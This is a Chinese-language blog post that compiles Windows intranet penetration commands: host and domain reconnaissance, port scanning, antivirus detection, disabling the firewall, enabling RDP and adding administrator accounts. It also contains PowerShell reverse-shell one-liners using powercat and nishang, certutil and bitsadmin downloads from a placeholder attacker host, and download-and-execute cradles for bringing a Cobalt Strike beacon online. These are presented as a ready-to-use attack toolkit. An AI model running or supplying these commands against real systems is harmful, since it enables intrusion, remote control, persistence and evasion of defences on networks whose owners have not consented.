<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    Windows內網滲透信息搜集命令匯總

    VSole2022-01-28 06:41:39

    本機信息收集

    查詢網絡配置信息

    ipconfig /all

    查詢本機的服務信息

    wmic service list brief

    查詢系統信息

    systeminfo

    查詢進程列表

    tasklist / wmic process list brief

    查看計劃任務

    schtasks /query /fo LIST /v 列出計劃任務詳細信息

    查看主機開機時間

    net statistics workstation

    用戶相關

    net user 查看所有用戶

    net localgroup administrators 獲取本地管理員信息

    查看端口列表

    netstat -ano

    查看已打補丁

    wmic qfe get Caption,Description,HotFixID,InstalledOn

    查看共享列表

    net share 查看本機共享列表和可訪問的域共享列表

    wmic share get name,path,status 查找共享列表


    路由表和arp高速緩存表

    route print 路由表

    arp -a arp高速緩存表

    防火墻

    netsh firewall set opmode disable 關閉防火墻(Windows Server 2003 以前的版本)

    netsh advfirewall set allprofiles state off 關閉防火墻(Windows Server 2003 以后的版本)

    netsh firewall show config 查看防火墻配置

    如果上面的命令被棄用,則使用

    netsh advfirewall firewall show rule name=all

    根據參考,可以使用這個wmic一鍵獲取本機信息http://www.fuzzysecurity.com/scripts/files/wmic_info.rar

    域信息收集

    權限查看

    whoami /all 查看自己的詳細權限

    net user xxx /domain 查看域內指定用戶的權限

    判斷是否存在域

    .net time /domain 若出現以下情況則不存在域

    若是報錯:發生系統錯誤5,則存在域,但該用戶不是域用戶

    若是以下情況則說明存在域且已經在域中

    查看域的名字

    net config workstation

    nslookup -type=srv _ldap._tcp

    這個很爽,域控主機名和IP一塊弄出來了

    探測域內存活主機

    1.使用工具 nbtscan http://www.unixwiz.net/tools/nbtscan.html

    2.查看arp高速緩存表

    arp -a

    3.ICMP協議探測(逐個ping)

    這個賊慢,但是不用下載其他應用

    CODE

    for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.1.%I | findstr "TTL"
    

    4.nmap直接開掃

    5.meterpreter會話中執行 run windows/gather/enum_ad_computers

    掃描域內開放端口

    1.nmap

    nmap 192.168.1.0/24

    2.工具 S掃描器

    3.自寫腳本

    CODE

    #python3 慢的一批
    import socket
    
    def get_ip_status(ip,port):
        server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            server.connect((ip,port))
            print('{0} port {1} is open'.format(ip, port))
        except Exception as err:
            print('{0} port {1} is not open'.format(ip,port))
        finally:
            server.close()
    
    if __name__ == '__main__':
        host = '172.16.0.198'
        for port in range(20,100):
            get_ip_status(host,port)
    

    域內基本信息

    net group “domain computers” /domain 查詢所有域成員計算機列表

    net view /domain:HACHE 查詢域內所有主機

    net accounts /domain 獲取域密碼信息

    nltest /domain_trusts 獲取域信任信息

    nltest /DCLIST:hacke 查看域控制器機器名

    Nslookup -type=SRV_ldap._tcp 查看域控制器的主機名

    域用戶信息收集

    net user /domain 向域控制器查詢域內用戶列表

    wmic useraccount get /all 獲取域內用戶詳細信息

    net localgroup administrators 查詢本地管理員用戶

    net group “domain admins” /domain 查詢域管理員用戶

    net group “Enterprise admins” /domain 查詢管理員用戶組

    本機wmic查殺軟

    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List

    or

    WMIC /namespace:\root\securitycenter2 path antivirusproduct GET displayName,productState, pathToSignedProductExe

    開3389

    REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

    用戶增刪改查

    net user username password /add 加用戶

    net localgroup administrators username /add 添加XX到管理員賬戶

    一些喜歡用的

    Windows 反彈shell

    CODE

    powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c 192.168.1.4 -p 9999 -e cmd
    
    powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.203.140 -port 6666
    

    wmic 查殺軟

    CODE

    WMIC /namespace:\\root\securitycenter2 path antivirusproduct GET displayName,productState, pathToSignedProductExe
    
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
    

    開3389

    CODE

    REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
    
    wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
    
    wmic /namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') call setuserauthenticationrequired 0
    

    常見殺軟進程名

    https://blog.csdn.net/weixin_39997829/article/details/92666552

    cmd下載

    CODE

    bitsadmin /transfer n http://www.xx.com/code.jpg c:\users\sdyp\desktop\ff.jpg
    
    C:\Temp>certutil.exe -urlcache -split -f "https://hackers.home/badcontent.txt" bad.txt
    C:\Temp>certutil.exe -decode bad.txt bad.exe
    

    獲取盤符

    CODE

    wmic logicaldisk where drivetype=3 get deviceid
    

    ps cs 上線

    CODE

    powershell.exe -c IEX((new-object net.webclient).downloadstring('http://xxx/a.ps1'))
    
    powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex"
    
    powershell -exec bypass -f \\webdavserver\folder\payload.ps1   (smb)
    
    domainnamespace
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    systeminfo | findstr /B /C:"OS Name" /C:"OS Version". systeminfo | findstr /B /C:"OS 名稱" /C:"OS 版本" #中文操作系統。schtasks /query /fo LIST /v #query顯示所有計劃任務。
    本機信息收集 查詢網絡配置信息 ipconfig /all 查詢本機的服務信息 wmic service list brief
    主機信息搜集 查看系統信息 systeminfo Windows 輔助提權 http://payloads.net/Windows_patch/
    網滲透信息搜集命令總匯
    SharpStrike是一款基于C#開發的后滲透工具,該工具可以使用CIM或WMI來查詢遠程系統。除此之外,該工具還可以使用研究人員提供的憑證信息或使用當前的用戶會話。 注意:SharpStrike中的某些命令將使用PowerShell結合WMI以實現其功能。
    ldap連接地址為:ldap://192.168.11.16 用戶為hack 密碼為test123.. 在域外我們需要指定ip地址,在域內我們只需要指定域名也行,例如測試環境的redteam,也就是ldap://redteam,這里就說明我們寫代碼的時候就需要考慮是在域內還是在域外。 在c#進行ldap連接的時候需要引入DirectoryServices.dll,這個是系統自帶的,自行尋找。
    信息搜集:開源情報信息收集、創建企業密碼字典進入內網:基于企業弱賬號漏洞、基于系統漏洞進入、網站應用程序滲透隱匿攻擊:Command and Control、代理內網跨邊界應用:內網跨邊界轉發、內網跨邊界代理穿透、shell反彈等
    一個內網安全攻防的知識倉庫
    前言作為一個資深后端碼農天天都要和數據庫打交道,最早使用的是 Hiberate,一個封裝性極強的持久性框架。自從接觸到 Mybatis 就被它的靈活性所折服了,可以自己寫 SQL,雖然輕量級,但是麻雀雖小,五臟俱全。這篇文章就來講講什么是 Mybatis,如何簡單的使用 Mybatis。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类